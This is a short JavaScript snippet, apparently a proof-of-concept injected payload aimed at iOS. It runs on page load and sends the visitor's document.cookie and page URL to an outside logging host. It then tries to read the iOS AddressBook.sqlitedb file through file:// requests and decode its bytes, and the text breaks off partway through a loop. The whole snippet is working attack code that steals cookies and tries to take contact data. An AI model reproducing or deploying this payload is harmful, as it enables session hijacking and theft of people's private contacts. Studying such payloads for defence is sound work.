$(function(){ //alert(document.cookie) //alert(location.href) $.get('http://ssig33.com/misc/for_log?cookie='+document.cookie+'&href='+location.href) $.get("file:///private/var/mobile/Library/AddressBook/AddressBook.sqlitedb").success(function(data){alert(data)}).error(function(){alert('error')}); x=new XMLHttpRequest(); x.open("get","file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb"); x.overrideMimeType("text/plain; charset=x-user-defined"); x.send(); x.onreadystatechange=function(){ if(x.readyState==4){ a=x.responseText || ""; ff=[];mx=a.length;scc=String.fromCharCode; for(var z=0;z